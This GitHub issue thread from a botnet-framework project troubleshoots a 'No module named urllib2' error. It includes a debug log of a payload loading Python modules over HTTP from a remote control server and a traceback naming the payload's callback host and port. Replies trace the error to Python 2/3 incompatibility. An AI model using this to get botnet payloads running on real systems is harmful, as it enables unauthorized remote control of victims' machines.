### ISSUE TITLE
help No module named 'urllib2'

### ISSUE THREAD

**Issue by souriens253** [malwaredllc/byob#86]
hi i have a problem i get this issue when i lunch the payload 
C:\Users\IEUser\Desktop>python kT7.py --debug
kT7.py:6: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp

> DEBUG:__main__:FINDER=================

DEBUG:__main__:Searching: urllib2
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:Checking if it is name repetition...
INFO:__main__:[+] Module/Package 'urllib2' can be loaded!
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading urllib2...
DEBUG:__main__:Trying to import 'urllib2' as package from: 'http://192.168.43.26:8082/urllib2/__init__.py'
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: StringIO
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:Checking if it is name repetition...
INFO:__main__:[+] Module/Package 'StringIO' can be loaded!
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading StringIO...
DEBUG:__main__:Trying to import 'StringIO' as package from: 'http://192.168.43.26:8082/StringIO/__init__.py'
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: colorama
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:Checking if it is name repetition...
INFO:__main__:[+] Module/Package 'colorama' can be loaded!
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading colorama...
DEBUG:__main__:Trying to import 'colorama' as package from: 'http://192.168.43.26:8082/colorama/__init__.py'
DEBUG:__main__:FINDER=================
DEBUG:__main__:Searching: requests
DEBUG:__main__:Path: None
INFO:__main__:Checking if in declared remote module names...
INFO:__main__:Checking if built-in....
INFO:__main__:Checking if it is name repetition...
INFO:__main__:[+] Module/Package 'requests' can be loaded!
DEBUG:__main__:LOADER=================
DEBUG:__main__:Loading requests...
DEBUG:__main__:Trying to import 'requests' as package from: 'http://192.168.43.26:8082/requests/__init__.py'
DEBUG:__main__:public_ip returned error: module 'urllib' has no attribute 'urlopen'
Traceback (most recent call last):
  File "kT7.py", line 2241, in <module>
    _payload = Payload(pastebin='', host='192.168.43.26', port='8080')
  File "kT7.py", line 1241, in __init__
    self.info = self._get_info()
  File "kT7.py", line 1282, in _get_info
    data = globals()['encrypt_aes'](json.dumps(info), self.key)
  File "kT7.py", line 1123, in encrypt_aes
    text = pad(plaintext)
  File "kT7.py", line 1048, in pad
    return s + (block_size - len(bytes(s)) % block_size) * chr(0)
TypeError: string argument without an encoding

C:\Users\IEUser\Desktop>python kT7.py --debug
kT7.py:6: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp
Traceback (most recent call last):
  File "kT7.py", line 9, in <module>
    import urllib2
ModuleNotFoundError: No module named 'urllib2'

How can i fix this 

Thank you

thank you

**Comment by ohld** [comment]
have you tried to `pip install urllib2`?

**Comment by thehappydinoa** [comment]
This means you are running Python 3 can you confirm?

**Comment by vladimirpe00** [comment]
> This means you are running Python 3 can you confirm?

indeed because urllib & urllib2 are merged together now in python3 all you need to  do is to remove urlib2 "import urlib2" and keep "import urllib"

**Comment by intrct** [comment]
to be clear this is an issue because the library is being loaded using python2 on the remote system (payload)

The remote system (bot) you're attempting to run on must include python3, or this will break;

There are two alternatives -- either we include a switch for python2 / python3 availability to automatically solve for this or support only for python3 on the bot endpoint and limit platforms.

Since this is an educational tool, I don't see an issue with this, unless there is a case where it's helpful to understand this on a platform that python3 is not available to.

**Comment by intrct** [comment]
I've written a PR that should hopefully resolve a part of this.

**Comment by malwaredllc** [comment]
This issue has been resolved in PR #127
